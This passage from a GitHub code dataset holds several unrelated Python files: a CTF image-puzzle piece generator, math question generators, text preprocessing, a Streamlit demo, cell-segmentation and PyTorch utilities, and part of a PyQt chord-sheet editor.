\"MALE\": 2\n }\n HANDLE_MASK = Image.open(\"mask.png\") # TODO resize this dude in proportion to piece size\n HANDLE_MASK_90 = HANDLE_MASK.rotate(90, expand=1)\n HANDLE_MASK_180 = HANDLE_MASK.rotate(180, expand=1)\n HANDLE_MASK_270 = HANDLE_MASK.rotate(270, expand=1)\n\n HANDLE_MASK_2 = Image.open(\"mask2.png\")\n HANDLE_MASK_2_90 = HANDLE_MASK_2.rotate(90, expand=1)\n HANDLE_MASK_2_180 = HANDLE_MASK_2.rotate(180, expand=1)\n HANDLE_MASK_2_270 = HANDLE_MASK_2.rotate(270, expand=1)\n\n def __init__(self, image_region):\n self.sides = [self.SIDE_TYPES[\"FLAT\"] for _ in range(4)] # top-right-down-left\n self.image_region = image_region\n\n @staticmethod\n def resize_handle(size):\n Piece.HANDLE_MASK.thumbnail(size)\n Piece.HANDLE_MASK_90 = Piece.HANDLE_MASK.rotate(90, expand=1)\n Piece.HANDLE_MASK_180 = Piece.HANDLE_MASK.rotate(180, expand=1)\n Piece.HANDLE_MASK_270 = Piece.HANDLE_MASK.rotate(270, expand=1)\n\n Piece.HANDLE_MASK_2.thumbnail(size)\n Piece.HANDLE_MASK_2_90 = Piece.HANDLE_MASK_2.rotate(90, expand=1)\n Piece.HANDLE_MASK_2_180 = Piece.HANDLE_MASK_2.rotate(180, expand=1)\n Piece.HANDLE_MASK_2_270 = Piece.HANDLE_MASK_2.rotate(270, expand=1)\n\n def set_side(self, side, side_type):\n self.sides[side] = side_type\n\n def set_opposite_side(self, side, side_type):\n side = (side + 2) % 4\n if side_type == self.SIDE_TYPES[\"MALE\"]:\n side_type = self.SIDE_TYPES[\"FEMALE\"]\n elif side_type == self.SIDE_TYPES[\"FEMALE\"]:\n side_type = self.SIDE_TYPES[\"MALE\"]\n\n self.set_side(side, side_type)\n\n def generate_mask(self):\n w,h = self.image_region.size\n handle_width, handle_height = self.HANDLE_MASK.size\n mask_width, mask_height = w+2*handle_width, h+2*handle_width\n left_offset = handle_width\n top_offset = handle_width\n piece_mask = Image.new(\"RGBA\", (mask_width, mask_height))\n draw = ImageDraw.Draw(piece_mask)\n draw.rectangle((left_offset, top_offset, left_offset+w-1, top_offset+h-1), (255,255,255))\n\n if self.sides[0] == self.SIDE_TYPES[\"MALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = 0\n piece_mask.paste(self.HANDLE_MASK_90, (left,top))\n if self.sides[1] == self.SIDE_TYPES[\"MALE\"]:\n top_handle_offset = top_offset + ((h-handle_height) // 2)\n left_handle_offset = left_offset + w\n piece_mask.paste(self.HANDLE_MASK, (left_handle_offset, top_handle_offset))\n if self.sides[2] == self.SIDE_TYPES[\"MALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset + h\n piece_mask.paste(self.HANDLE_MASK_270, (left,top))\n if self.sides[3] == self.SIDE_TYPES[\"MALE\"]:\n left = 0\n top = top_offset + ((h-handle_height) // 2)\n piece_mask.paste(self.HANDLE_MASK_180, (left,top))\n\n if self.sides[0] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset\n piece_mask.paste(self.HANDLE_MASK_2_270, (left,top))\n if self.sides[1] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + w - handle_width\n top = top_offset + ((h-handle_height) // 2)\n piece_mask.paste(self.HANDLE_MASK_2_180, (left,top))\n if self.sides[2] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset + h - handle_width\n piece_mask.paste(self.HANDLE_MASK_2_90, (left,top))\n if self.sides[3] == self.SIDE_TYPES[\"FEMALE\"]:\n top_handle_offset = top_offset + ((h-handle_height) // 2)\n left_handle_offset = left_offset\n piece_mask.paste(self.HANDLE_MASK_2, (left_handle_offset, top_handle_offset))\n return piece_mask\n\n\nif __name__ == \"__main__\":\n board = Board(\"stego.png\")\n board.generate_pieces()\n","repo_name":"UnitedCTF/UnitedCTF-2019","sub_path":"challenges/steg/puzzle_hero/generate_pieces.py","file_name":"generate_pieces.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"20649815909","text":"# question_strategies/addition.py\n# In-built imports\nfrom typing import Type\nimport math\n\n# Third-party imports\n\n# Sys-Paths for Relative Imports\nimport sys\nfrom os.path import dirname, abspath\npackage_path = dirname(dirname(abspath(__file__)))\nif(package_path not in sys.path): sys.path.insert(0, package_path)\n\n# Relative imports\nfrom question_strategies import question\n\nclass PermuataionQuestionType1(question.QuestionType):\n Q_TYPE = \"PermuataionType1\"\n INIT_VARIABLES= {\n \"number_of_nums\": \"int\"\n }\n def __init__(self, number_generator_cls:question.numGenType) -> None:\n super().__init__()\n self.number_generator_obj = number_generator_cls\n\n def generate_question(self) -> question.Question:\n n ,r = sorted([self.number_generator_obj.number() for i in range(2)], reverse=True)\n p = math.factorial(n) / math.factorial(n - r)\n print(p)\n question_string = f\"Find the number of permutaions when n={n} and r={r} repeatation not allowed\"\n return question.Question(question_string, p, self.Q_TYPE)\n\nclass PermuataionQuestionType2(question.QuestionType):\n Q_TYPE = \"PermuataionType2\"\n INIT_VARIABLES= {\n \"number_of_nums\": \"int\"\n }\n def __init__(self, number_generator_cls:question.numGenType) -> None:\n super().__init__()\n self.number_generator_obj = number_generator_cls\n\n def generate_question(self) -> question.Question:\n n ,r = sorted([self.number_generator_obj.number() for i in range(2)], reverse=True)\n p = n**r\n question_string = f\"Find the number of permutaions when n={n} and r={r} repeatation allowed\"\n return question.Question(question_string, p, self.Q_TYPE)\n\nTYPE_LOOKUP:dict[str, Type[question.QuestionType]] = {\n \"without repeatation\": PermuataionQuestionType1, # without repeatation\n \"with repeatation\": PermuataionQuestionType2 # with repeatation\n}\n\n","repo_name":"jagrutgala/SEM-VI-Project","sub_path":"math_gen_api/question_strategies/permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994600809","text":"from aurora.nouns.instruments import Violin\nfrom aurora.nouns.performers.Performer import Performer\n\n\nclass Violinist(Performer):\n '''Model of a violinist as a performer.'''\n\n def __init__(self, name, instruments = []):\n primary = [Violin()]\n primary.extend(instruments)\n Performer.__init__(self, name, primary)\n","repo_name":"josiah-wolf-oberholtzer/aurora","sub_path":"aurora/nouns/performers/Violinist/Violinist.py","file_name":"Violinist.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23781312229","text":"import re\nimport string\nimport numpy as np\nimport pandas as pd\n\n\nclass Pre_Processing_data:\n\n def read_textfile(self, file):\n with open(file, encoding='utf8') as in_file:\n stripped = (line.strip() for line in in_file)\n tweets_ = {}\n for line in stripped:\n lines = [splits for splits in line.split(\"\\t\") if splits != \"\"]\n tweets_[lines[1]] = float(lines[0])\n df = pd.DataFrame(tweets_.items(), columns=['tweets', 'sentiment'])\n df = df.sample(frac=1).reset_index(drop=True)\n return df\n\n def cleantext(self, df, text_column=None, remove_stopwords=True, remove_punchuation=True):\n df[text_column] = df[text_column].str.lower()\n stopwords = [\"a\", \"about\", \"above\", \"after\", \"again\", \"against\",\n \"all\", \"am\", \"an\", \"and\", \"any\", \"are\",\n \"as\", \"at\", \"be\", \"because\",\n \"been\", \"before\", \"being\", \"below\",\n \"between\", \"both\", \"but\", \"by\", \"could\",\n \"did\", \"do\", \"does\", \"doing\", \"down\", \"during\",\n \"each\", \"few\", \"for\", \"from\", \"further\",\n \"had\", \"has\", \"have\", \"having\", \"he\",\n \"he'd\", \"he'll\", \"he'stoch\", \"her\", \"here\",\n \"here'stoch\", \"hers\", \"herself\", \"him\",\n \"himself\", \"his\", \"how\", \"how'stoch\", \"i\",\n \"i'd\", \"i'll\", \"i'm\", \"i've\",\n \"if\", \"in\", \"into\",\n \"is\", \"it\", \"it'stoch\", \"its\",\n \"itself\", \"let'stoch\", \"me\", \"more\",\n \"most\", \"my\", \"myself\", \"nor\", \"of\",\n \"on\", \"once\", \"only\", \"or\",\n \"other\", \"ought\", \"our\", \"ours\",\n \"ourselves\", \"out\", \"over\", \"own\", \"same\",\n \"she\", \"she'd\", \"she'll\", \"she'stoch\", \"should\",\n \"so\", \"some\", \"such\", \"than\", \"that\",\n \"that'stoch\", \"the\", \"their\", \"theirs\", \"them\",\n \"themselves\", \"then\", \"there\", \"there'stoch\",\n \"these\", \"they\", \"they'd\", \"they'll\",\n \"they're\", \"they've\", \"this\", \"those\",\n \"through\", \"to\", \"too\", \"under\", \"until\", \"up\",\n \"very\", \"was\", \"we\", \"we'd\", \"we'll\",\n \"we're\", \"we've\", \"were\", \"what\",\n \"what'stoch\", \"when\", \"when'stoch\",\n \"where\", \"where'stoch\",\n \"which\", \"while\", \"who\", \"who'stoch\",\n \"whom\", \"why\", \"why'stoch\", \"with\",\n \"would\", \"you\", \"you'd\", \"you'll\",\n \"you're\", \"you've\",\n \"your\", \"yours\", \"yourself\", \"yourselves\"]\n\n def remove_stopwords(data, column):\n data[f'{column} without stopwords'] = data[column].apply(\n lambda x: ' '.join([word for word in x.split() if word not in stopwords]))\n return data\n\n def remove_tags(string):\n result = re.sub('<*>', '', string)\n return result\n\n # remove html tags and brackets from text\n if remove_stopwords:\n without_stopwords = remove_stopwords(df, text_column)\n without_stopwords[f'clean_{text_column}'] = without_stopwords[\n f'{text_column} without stopwords'].apply(\n lambda cw: remove_tags(cw))\n if remove_punchuation:\n without_stopwords[f'clean_{text_column}'] = without_stopwords[f'clean_{text_column}'].str.replace(\n '[{}]'.format(string.punctuation), ' ', regex=True)\n\n X = without_stopwords[f'clean_{text_column}'].to_numpy()\n\n return X\n\n def sent_tokeniser(self, x):\n sentences = re.split(r'(?=3.6\",\n)\n","repo_name":"felixbrunner/euraculus","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19824876258","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nst.title('Uber pickups in NYC')\r\n\r\nDATE_COLUMN = 'date/time'\r\nDATA_URL = ('https://s3-us-west-2.amazonaws.com/''streamlit-demo-data/uber-raw-data-sep14.csv.gz')\r\n\r\n# caches data that is loaded into dataframe\r\n@st.cache_data\r\ndef load_data(nrows):\r\n data = pd.read_csv(DATA_URL, nrows = nrows)\r\n lowercase = lambda x: str(x).lower()\r\n data.rename(lowercase, axis = 'columns', inplace = True)\r\n data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\r\n return data\r\n\r\n\r\n# Creates text box informing reader that the data is loading\r\ndata_load_state = st.text('Loading data...')\r\n\r\n# Loads 10,000 rows of data\r\ndata = load_data(10000)\r\n\r\n# Informs reader that data has loaded\r\n# st.cache_data allows for immediate data loadtime, good for long-running computations\r\ndata_load_state.text(\"Done! (using st.cache_data)\")\r\n\r\n# Checkbox button to toggle raw data\r\nif st.checkbox('Show raw data'):\r\n st.subheader('Raw data')\r\n st.write(data)\r\n\r\n\r\n# Creates a histogram of pickup times sorted by hour\r\nst.subheader('Number of pickups by hour')\r\n\r\nhist_values = np.histogram (\r\n data[DATE_COLUMN].dt.hour, bins = 24, range = (0,24))[0]\r\n\r\nst.bar_chart(hist_values)\r\n\r\n# Shows pickups concentration at 5pm (busiest time) in New York as a histogram\r\nhour_to_filter = st.slider('hour', 0, 23, 17) # min: 0h, max: 23h, default: 17h\r\nfiltered_data = data[data[DATE_COLUMN].dt.hour == hour_to_filter]\r\nst.subheader(f'Map of all pickups at {hour_to_filter}:00')\r\nst.map(filtered_data)\r\n","repo_name":"amoore2829/StreamLit-Learning","sub_path":"Practice/StreamLit_Docs_App/uber_pickups.py","file_name":"uber_pickups.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7860600966","text":"import argparse\r\nimport json\r\nimport numpy as np\r\nimport random\r\nimport torch\r\nimport warnings\r\n\r\nfrom pathlib import Path\r\n\r\nfrom segmentation.inference.inference import inference_2d_ctc, inference_3d_ctc\r\nfrom segmentation.training.cell_segmentation_dataset import CellSegDataset\r\nfrom segmentation.training.autoencoder_dataset import AutoEncoderDataset\r\nfrom segmentation.training.create_training_sets import create_ctc_training_sets, create_sim_training_sets\r\nfrom segmentation.training.mytransforms import augmentors\r\nfrom segmentation.training.training import train, train_auto\r\nfrom segmentation.utils import utils, unets\r\nfrom segmentation.utils.metrics import ctc_metrics, count_det_errors\r\n\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\r\n\r\ndef main():\r\n\r\n random.seed()\r\n np.random.seed()\r\n\r\n # Get arguments\r\n parser = argparse.ArgumentParser(description='Cell Segmentation')\r\n parser.add_argument('--train', '-t', default=False, action='store_true', help='Train new models')\r\n parser.add_argument('--evaluate', '-e', default=False, action='store_true', help='Evaluate models')\r\n parser.add_argument('--inference', '-i', default=False, action='store_true', help='Inference')\r\n parser.add_argument('--save_raw_pred', '-s', default=False, action='store_true', help='Save raw predictions')\r\n parser.add_argument('--cell_type', '-c', default='all', type=str, help='Cell type')\r\n parser.add_argument('--mode', '-m', default='GT', type=str, help='Mode for training')\r\n parser.add_argument('--th_seed', '-th_s', default=0.45, type=float, help='Seed threshold')\r\n parser.add_argument('--th_cell', '-th_c', default=0.08, type=float, help='Cell size threshold')\r\n parser.add_argument('--apply_clahe', '-ac', default=False, action='store_true', help='Apply CLAHE')\r\n parser.add_argument('--n_splitting', '-ns', default=40, type=int, help='Cell number to apply local splitting (only 3D)')\r\n parser.add_argument('--scale', '-sc', default=1.0, type=float, help='Scale for down-/upsampling (inference)')\r\n parser.add_argument('--batch_size', '-bs', default=8, type=int, help='Batch size (inference)')\r\n parser.add_argument('--multi_gpu', '-mgpu', default=True, action='store_true', help='Use multiple GPUs')\r\n parser.add_argument('--artifact_correction', default=False, action='store_true', help='Artifact correction (only for very dense cells, e.g., HSC')\r\n parser.add_argument('--fuse_z_seeds', default=False, action='store_true', help='Fuse seeds in z-direction')\r\n parser.add_argument('--cuda', default=False, action='store_true', help='Use CUDA')\r\n\r\n args = parser.parse_args()\r\n\r\n with open(Path.cwd() / 'cell_segmentation_train_settings.json') as f:\r\n settings = json.load(f)\r\n\r\n paths = {\r\n \"cell_types\":\r\n [\r\n \"cell\"\r\n ],\r\n \"path_ctc_metric\": \"EvaluationSoftware/\",\r\n \"path_data\": \"data/\",\r\n \"path_results\": \"results/\"\r\n }\r\n\r\n # Paths\r\n path_datasets = Path(paths['path_data'])\r\n path_results = Path(paths['path_results'])\r\n if path_results == '':\r\n path_results = path_datasets\r\n path_models = path_results / 'segmentation_models'\r\n path_best_models = path_datasets / 'Models' / 'Model'\r\n path_train_data = path_results / 'training_sets'\r\n path_ctc_metric = Path(paths['path_ctc_metric'])\r\n if args.cell_type == 'all':\r\n cell_types = paths['cell_types']\r\n else:\r\n cell_types = [args.cell_type]\r\n\r\n # Set device for using CPU or GPU\r\n if args.cuda:\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n else:\r\n device = \"cpu\"\r\n print('using ', device)\r\n if str(device) == 'cuda':\r\n torch.backends.cudnn.benchmark = True\r\n if args.multi_gpu:\r\n num_gpus = torch.cuda.device_count()\r\n else:\r\n num_gpus = 1\r\n print('multi gpus ', num_gpus)\r\n\r\n if args.train: # Train model from scratch\r\n\r\n # Make directory for the trained models\r\n path_models.mkdir(exist_ok=True)\r\n\r\n print('Create training sets for all cell types ...')\r\n create_ctc_training_sets(path_data=path_datasets,\r\n path_train_sets=path_train_data,\r\n cell_types=paths['cell_types'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n main()","repo_name":"avivshalem/Cell-Insights","sub_path":"Segmentation_Pipeline/CreateDatasetBeforeTraining.py","file_name":"CreateDatasetBeforeTraining.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9277814007","text":"import torch\nfrom torch import nn\n\n\nclass SuperCov(nn.Module):\n \"\"\"SuperCov Network\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.relu = nn.ReLU(inplace=True)\n self.leaky_relu = nn.LeakyReLU(inplace=True)\n self.sigmoid = nn.Sigmoid()\n c1, c2, c3, c4 = 16, 16, 32, 32\n\n self.conv1a = nn.Conv2d(1, c1, kernel_size=3, stride=1, padding=1)\n self.conv1b = nn.Conv2d(c1, c1, kernel_size=3, stride=1, padding=1)\n self.conv2a = nn.Conv2d(c1, c2, kernel_size=3, stride=1, padding=1)\n self.conv2b = nn.Conv2d(c2, c2, kernel_size=3, stride=1, padding=1)\n self.conv3a = nn.Conv2d(c2, c3, kernel_size=3, stride=1, padding=1)\n self.conv3b = nn.Conv2d(c3, c3, kernel_size=3, stride=1, padding=1)\n\n self.conv4a = nn.Conv2d(c3, c4, kernel_size=3, stride=1, padding=1)\n self.conv4b = nn.Conv2d(c4, 3, kernel_size=1, stride=1, padding=0)\n\n def forward(self, data):\n \"\"\"Compute keypoints, scores, descriptors for image\"\"\"\n # Shared Encoder\n x = self.relu(self.conv1a(data))\n x = self.relu(self.conv1b(x))\n x = self.relu(self.conv2a(x))\n x = self.relu(self.conv3a(x))\n\n # Compute the dense keypoint scores\n x = self.relu(self.conv4a(x))\n x = self.conv4b(x)\n\n return x\n","repo_name":"DominikMuhle/dnls_covs","sub_path":"scripts/covpred/model/superpoint_architecture.py","file_name":"superpoint_architecture.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"17924544591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 00:02:24 2019\n\n@author: ivan\n\"\"\"\n\nimport sys\nimport fitz\nimport io\nimport subprocess\nimport os\nimport time\nfrom copy import copy\n\nfrom PyQt5.QtWidgets import QApplication, QAction, QLabel, QDialogButtonBox, QDialog, QFileDialog, QMessageBox, QPushButton, QLineEdit, QCheckBox, QSpinBox, QDoubleSpinBox, QTableWidgetItem, QTabWidget, QComboBox, QWidget, QScrollArea, QMainWindow, QShortcut\nfrom PyQt5.QtCore import QFile, QObject, Qt, pyqtSlot, QSettings\nfrom PyQt5.QtGui import QPixmap, QImage, QKeySequence\nfrom PyQt5 import uic\nfrom chordsheet.tableView import ChordTableView, BlockTableView\nfrom chordsheet.comboBox import MComboBox\nfrom chordsheet.pdfViewer import PDFViewer\n\nfrom reportlab.lib.units import mm, cm, inch, pica\nfrom reportlab.lib.pagesizes import A4, A5, LETTER, LEGAL\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom chordsheet.document import Document, Style, Chord, Block, Section\nfrom chordsheet.render import Renderer\nfrom chordsheet.parsers import parseFingering, parseName\n\nimport _version\n\n# set the directory where our files are depending on whether we're running a pyinstaller binary or not\nif getattr(sys, 'frozen', False):\n scriptDir = sys._MEIPASS\nelse:\n scriptDir = os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\n\n# enable automatic high DPI scaling on Windows\nQApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)\nQApplication.setOrganizationName(\"Ivan Holmes\")\nQApplication.setOrganizationDomain(\"ivanholmes.co.uk\")\nQApplication.setApplicationName(\"Chordsheet\")\nsettings = QSettings()\n\npdfmetrics.registerFont(\n TTFont('FreeSans', os.path.join(scriptDir, 'fonts', 'FreeSans.ttf')))\nif sys.platform == \"darwin\":\n pdfmetrics.registerFont(\n TTFont('HelveticaNeue', 'HelveticaNeue.ttc', subfontIndex=0))\n\n# dictionaries for combo boxes\npageSizeDict = {'A4': A4, 'A5': A5, 'Letter': LETTER, 'Legal': LEGAL}\n# point is 1 because reportlab's native unit is points.\nunitDict = {'mm': mm, 'cm': cm, 'inch': inch, 'point': 1, 'pica': pica}\n\n\nclass DocumentWindow(QMainWindow):\n \"\"\"\n Class for the main window of the application.\n \"\"\"\n\n def __init__(self, doc, style, filename=None):\n \"\"\"\n Initialisation function for the main window of the application.\n\n Arguments:\n doc -- the Document object for the window to use\n style -- the Style object for the window to use\n \"\"\"\n super().__init__()\n\n self.doc = doc\n self.style = style\n self.renderer = Renderer(self.doc, self.style)\n\n self.lastDoc = copy(self.doc)\n self.currentFilePath = filename\n\n self.UIFileLoader(str(os.path.join(scriptDir, 'ui', 'mainwindow.ui')))\n self.UIInitStyle()\n self.updateChordDict()\n self.updateSectionDict()\n self.currentSection = None\n\n self.setCentralWidget(self.window.centralWidget)\n self.setMenuBar(self.window.menuBar)\n self.setWindowTitle(\"Chordsheet\")\n\n if filename:\n try:\n self.openFile(filename)\n except Exception:\n UnreadableMessageBox().exec()\n\n def closeEvent(self, event):\n \"\"\"\n Reimplement the built in closeEvent to allow asking the user to save.\n \"\"\"\n if self.saveWarning():\n self.close()\n\n def UIFileLoader(self, ui_file):\n \"\"\"\n Loads the .ui file for this window and connects the UI elements to their actions.\n \"\"\"\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.window = uic.loadUi(ui_file)\n ui_file.close()\n\n # link all the UI elements\n self.window.actionAbout.triggered.connect(self.menuFileAboutAction)\n\n self.window.actionNew.triggered.connect(self.menuFileNewAction)\n self.window.actionOpen.triggered.connect(self.menuFileOpenAction)\n self.window.actionSave.triggered.connect(self.menuFileSaveAction)\n self.window.actionSave_as.triggered.connect(self.menuFileSaveAsAction)\n self.window.actionSave_PDF.triggered.connect(\n self.menuFileSavePDFAction)\n self.window.actionPrint.triggered.connect(self.menuFilePrintAction)\n self.window.actionClose.triggered.connect(self.menuFileCloseAction)\n self.window.actionUndo.triggered.connect(self.menuEditUndoAction)\n self.window.actionRedo.triggered.connect(self.menuEditRedoAction)\n self.window.actionCut.triggered.connect(self.menuEditCutAction)\n self.window.actionCopy.triggered.connect(self.menuEditCopyAction)\n self.window.actionPaste.triggered.connect(self.menuEditPasteAction)\n\n self.window.actionNew.setShortcut(QKeySequence.New)\n self.window.actionOpen.setShortcut(QKeySequence.Open)\n self.window.actionSave.setShortcut(QKeySequence.Save)\n self.window.actionSave_as.setShortcut(QKeySequence.SaveAs)\n self.window.actionSave_PDF.setShortcut(QKeySequence(\"Ctrl+E\"))\n self.window.actionPrint.setShortcut(QKeySequence.Print)\n self.window.actionClose.setShortcut(QKeySequence.Close)\n self.window.actionUndo.setShortcut(QKeySequence.Undo)\n self.window.actionRedo.setShortcut(QKeySequence.Redo)\n self.window.actionCut.setShortcut(QKeySequence.Cut)\n self.window.actionCopy.setShortcut(QKeySequence.Copy)\n self.window.actionPaste.setShortcut(QKeySequence.Paste)\n\n self.window.pageSizeComboBox.currentIndexChanged.connect(\n self.pageSizeAction)\n self.window.documentUnitsComboBox.currentIndexChanged.connect(\n self.unitAction)\n\n self.window.includedFontCheckBox.stateChanged.connect(\n self.includedFontAction)\n\n self.window.generateButton.clicked.connect(self.generateAction)\n\n # update whole document when any tab is selected\n self.window.tabWidget.tabBarClicked.connect(self.tabBarUpdateAction)\n\n self.window.guitarVoicingButton.clicked.connect(\n self.guitarVoicingAction)\n self.window.addChordButton.clicked.connect(self.addChordAction)\n self.window.removeChordButton.clicked.connect(self.removeChordAction)\n self.window.updateChordButton.clicked.connect(self.updateChordAction)\n\n # connecting clicked only works for this combo box because it's my own modified version (MComboBox)\n self.window.blockSectionComboBox.clicked.connect(\n self.blockSectionClickedAction)\n self.window.blockSectionComboBox.currentIndexChanged.connect(\n self.blockSectionChangedAction)\n self.window.addBlockButton.clicked.connect(self.addBlockAction)\n self.window.removeBlockButton.clicked.connect(self.removeBlockAction)\n self.window.updateBlockButton.clicked.connect(self.updateBlockAction)\n\n self.window.addSectionButton.clicked.connect(self.addSectionAction)\n self.window.removeSectionButton.clicked.connect(\n self.removeSectionAction)\n self.window.updateSectionButton.clicked.connect(\n self.updateSectionAction)\n\n self.window.chordTableView.clicked.connect(self.chordClickedAction)\n self.window.sectionTableView.clicked.connect(self.sectionClickedAction)\n self.window.blockTableView.clicked.connect(self.blockClickedAction)\n\n def UIInitDocument(self):\n \"\"\"\n Fills the window's fields with the values from its document.\n \"\"\"\n self.updateTitleBar()\n\n # set all fields to appropriate values from document\n self.window.titleLineEdit.setText(self.doc.title)\n self.window.subtitleLineEdit.setText(self.doc.subtitle)\n self.window.composerLineEdit.setText(self.doc.composer)\n self.window.arrangerLineEdit.setText(self.doc.arranger)\n self.window.timeSignatureSpinBox.setValue(self.doc.timeSignature)\n self.window.tempoLineEdit.setText(self.doc.tempo)\n\n self.window.chordTableView.populate(self.doc.chordList)\n self.window.sectionTableView.populate(self.doc.sectionList)\n # populate the block table with the first section, account for a document with no sections\n self.currentSection = self.doc.sectionList[0] if len(\n self.doc.sectionList) else None\n self.window.blockTableView.populate(\n self.currentSection.blockList if self.currentSection else [])\n self.updateSectionDict()\n self.updateChordDict()\n\n def UIInitStyle(self):\n \"\"\"\n Fills the window's fields with the values from its style.\n \"\"\"\n self.window.pageSizeComboBox.addItems(list(pageSizeDict.keys()))\n self.window.pageSizeComboBox.setCurrentText(\n list(pageSizeDict.keys())[0])\n\n self.window.documentUnitsComboBox.addItems(list(unitDict.keys()))\n self.window.documentUnitsComboBox.setCurrentText(\n list(unitDict.keys())[0])\n\n self.window.lineSpacingDoubleSpinBox.setValue(self.style.lineSpacing)\n\n self.window.leftMarginLineEdit.setText(str(self.style.leftMargin))\n self.window.rightMarginLineEdit.setText(str(self.style.rightMargin))\n self.window.topMarginLineEdit.setText(str(self.style.topMargin))\n self.window.bottomMarginLineEdit.setText(str(self.style.bottomMargin))\n\n\n self.window.fontComboBox.setDisabled(True)\n self.window.includedFontCheckBox.setChecked(True)\n\n self.window.beatWidthLineEdit.setText(str(self.style.unitWidth))\n\n def tabBarUpdateAction(self, index):\n self.updateDocument()\n \n def pageSizeAction(self, index):\n self.pageSizeSelected = self.window.pageSizeComboBox.itemText(index)\n\n def unitAction(self, index):\n self.unitSelected = self.window.documentUnitsComboBox.itemText(index)\n\n def includedFontAction(self):\n if self.window.includedFontCheckBox.isChecked():\n self.style.useIncludedFont = True\n else:\n self.style.useIncludedFont = False\n\n def chordClickedAction(self, index):\n # set the controls to the values from the selected chord\n self.window.chordNameLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 0).text())\n self.window.guitarVoicingLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 1).text())\n self.window.pianoVoicingLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 2).text())\n\n def sectionClickedAction(self, index):\n # set the controls to the values from the selected section\n self.window.sectionNameLineEdit.setText(\n self.window.sectionTableView.model.item(index.row(), 0).text())\n # also set the combo box on the block page to make it flow well\n curSecName = self.window.sectionTableView.model.item(\n index.row(), 0).text()\n if curSecName:\n self.window.blockSectionComboBox.setCurrentText(\n curSecName)\n\n def blockSectionClickedAction(self, text):\n if text:\n self.updateBlocks(self.sectionDict[text])\n\n def blockSectionChangedAction(self, index):\n sName = self.window.blockSectionComboBox.currentText()\n if sName:\n self.currentSection = self.sectionDict[sName]\n self.window.blockTableView.populate(self.currentSection.blockList)\n else:\n self.currentSection = None\n\n def blockClickedAction(self, index):\n # set the controls to the values from the selected block\n bChord = self.window.blockTableView.model.item(index.row(), 0).text()\n self.window.blockChordComboBox.setCurrentText(\n bChord if bChord else \"None\")\n self.window.blockLengthLineEdit.setText(\n self.window.blockTableView.model.item(index.row(), 1).text())\n self.window.blockNotesLineEdit.setText(\n self.window.blockTableView.model.item(index.row(), 2).text())\n\n def getPath(self, value):\n \"\"\"\n Wrapper for Qt settings to return home directory if no setting exists.\n \"\"\"\n return str((settings.value(value) if settings.value(value) else os.path.expanduser(\"~\")))\n\n def setPath(self, value, fullpath):\n \"\"\"\n Wrapper for Qt settings to set path to open/save from next time from current file location.\n \"\"\"\n return settings.setValue(value, os.path.dirname(fullpath))\n\n def menuFileNewAction(self):\n if self.saveWarning(): # ask the user if they want to save \n self.doc = Document() #  new document object\n # copy this object as reference to check against on quitting\n self.lastDoc = copy(self.doc)\n #  reset file path (this document hasn't been saved yet)\n self.currentFilePath = None\n # new renderer\n self.renderer = Renderer(self.doc, self.style)\n self.UIInitDocument()\n self.updatePreview()\n\n def menuFileOpenAction(self):\n if self.saveWarning(): # ask the user if they want to save \n filePath = QFileDialog.getOpenFileName(self.window.tabWidget, 'Open file', self.getPath(\n \"workingPath\"), \"Chordsheet Markup Language files (*.xml *.cml);;Chordsheet Macro files (*.cma)\")[0]\n if filePath:\n self.openFile(filePath)\n\n def openFile(self, filePath):\n \"\"\"\n Opens a file from a file path and sets up the window accordingly.\n \"\"\"\n self.currentFilePath = filePath\n \n fileExt = os.path.splitext(self.currentFilePath)[1].lower()\n \n if fileExt == \".cma\":\n self.doc.loadCSMacro(self.currentFilePath)\n else: # if fileExt in [\".xml\", \".cml\"]:\n self.doc.loadXML(self.currentFilePath)\n \n self.lastDoc = copy(self.doc)\n self.setPath(\"workingPath\", self.currentFilePath)\n self.UIInitDocument()\n self.updatePreview()\n\n def menuFileSaveAction(self):\n self.updateDocument()\n\n fileExt = os.path.splitext(self.currentFilePath)[1].lower()\n\n if self.currentFilePath and fileExt != \".cma\":\n # Chordsheet Macro files can't be saved at this time\n self.saveFile(self.currentFilePath)\n else:\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"workingPath\"), \"Chordsheet ML files (*.xml 